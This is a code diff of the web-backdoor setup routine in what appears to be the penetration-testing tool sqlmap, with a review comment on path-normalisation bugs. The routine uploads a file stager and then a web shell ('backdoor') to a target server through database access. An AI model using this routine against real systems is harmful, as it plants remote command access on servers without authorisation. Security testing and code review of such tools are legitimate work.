@@ -198,9 +198,11 @@ def webInit(self):
198198 for j in xrange (len (directories )):
199199 docRoot = kb .docRoot [i ]
200200 directory = directories [j ]
201+ uriPath = ""
201202
202203 if not all (isinstance (item , basestring ) for item in [docRoot , directory ]):
203204 continue
205+
204206 directory = ntToPosixSlashes (normalizePath (directory )).replace ("//" , "/" ).rstrip ('/' )
205207 docRoot = ntToPosixSlashes (normalizePath (docRoot )).replace ("//" , "/" ).rstrip ('/' )
206208
@@ -226,17 +228,14 @@ def webInit(self):
226228 else :
227229 continue
228230
229- uriPath = uriPath .replace ("//" , "/" ).rstrip ('/' )
230- localPath = localPath .rstrip ('/' )
231-
232- if not uriPath :
233- uriPath = '/'
231+ localPath = os .path .normpath (localPath ).rstrip ('/' )
232+ uriPath = os .path .normpath (uriPath ).rstrip ('/' )
234233
235234 # Upload the file stager
236235 self .__webFileInject (stagerContent , stagerName , localPath )
237236
238237 self .webBaseUrl = "%s://%s:%d%s" % (conf .scheme , conf .hostname , conf .port , uriPath )
239- self .webStagerUrl = "%s/%s" % (self .webBaseUrl . rstrip ( '/' ) , stagerName )
238+ self .webStagerUrl = "%s/%s" % (self .webBaseUrl , stagerName )
240239
241240 uplPage , _ = Request .getPage (url = self .webStagerUrl , direct = True , raise404 = False )
242241
@@ -259,7 +258,7 @@ def webInit(self):
259258 kb .data .__VIEWSTATE = extractRegexResult (r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"" , uplPage , re .I )
260259
261260 infoMsg = "the file stager has been successfully uploaded "
262- infoMsg += "on '%s' ('%s') " % (localPath , self .webStagerUrl )
261+ infoMsg += "on '%s' - %s " % (localPath , self .webStagerUrl )
263262 logger .info (infoMsg )
264263
265264 if self .webApi == "asp" :
@@ -280,33 +279,38 @@ def webInit(self):
280279
281280 if self .__webFileStreamUpload (backdoorStream , backdoorName , backdoorDirectory ):
282281 self .__webFileStreamUpload (runcmdStream , runcmdName , backdoorDirectory )
283- self .webBackdoorUrl = "%s/Scripts/%s" % (self .webBaseUrl . rstrip ( '/' ) , backdoorName )
282+ self .webBackdoorUrl = "%s/Scripts/%s" % (self .webBaseUrl , backdoorName )
284283 self .webDirectory = backdoorDirectory
285284 else :
286285 continue
287286
288287 else :
289288 if not self .__webFileStreamUpload (backdoorStream , backdoorName , posixToNtSlashes (localPath ) if Backend .isOs (OS .WINDOWS ) else localPath ):
290289 warnMsg = "backdoor has not been successfully uploaded "
291- warnMsg += "with file stager probably because of "
292- warnMsg += "lack of write permission."
290+ warnMsg += "through the file stager possibly because "
291+ warnMsg += "the user running the web server process "
292+ warnMsg += "has not write privileges over the folder "
293+ warnMsg += "where the user running the DBMS process "
294+ warnMsg += "was able to upload the file stager or "
295+ warnMsg += "because the DBMS and web server sit on "
296+ warnMsg += "different servers"
293297 logger .warn (warnMsg )
294298
295299 message = "do you want to try the same method used "
296- message += "for the file stager? [y/N ] "
297- getOutput = readInput (message , default = "N " )
300+ message += "for the file stager? [Y/n ] "
301+ getOutput = readInput (message , default = "Y " )
298302
299303 if getOutput in ("y" , "Y" ):
300304 self .__webFileInject (backdoorContent , backdoorName , localPath )
301305 else :
302306 continue
303307
304- self .webBackdoorUrl = "%s/%s" % (self .webBaseUrl . rstrip ( '/' ) , backdoorName )
308+ self .webBackdoorUrl = "%s/%s" % (self .webBaseUrl , backdoorName )
305309 self .webDirectory = localPath
306310
307311 infoMsg = "the backdoor has probably been successfully "
308- infoMsg += "uploaded on '%s', go with your browser " % self .webDirectory
309- infoMsg += "to '%s' and enjoy it!" % self .webBackdoorUrl
312+ infoMsg += "uploaded on '%s' - " % self .webDirectory
313+ infoMsg += self .webBackdoorUrl
310314 logger .info (infoMsg )
311315
312316 success = True
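Review bot: The `os.path.normpath` calls at new lines 231-232 normalise a remote file path and a URI path with the rules of whichever OS runs the tool, so on a Windows host both come back with backslashes, the trailing `rstrip('/')` no longer strips anything, and the `webBaseUrl` built at line 237 is malformed. `normpath("")` also returns `"."`, and the commit removes the old `if not uriPath: uriPath = '/'` guard while initialising `uriPath = ""` at line 201, so an empty value would give a base URL ending in `.`. Whether that is reachable depends on the branches between the hunks, which are not shown. I would switch both lines to `posixpath.normpath(...)` (with `import posixpath` at the top of the file) and guard the empty case, e.g. `uriPath = posixpath.normpath(uriPath).rstrip('/') if uriPath else ""`. Note that `normpath` keeps a leading `//`, which the removed `.replace("//", "/")` used to collapse; `webInit` starts and ends outside these hunks.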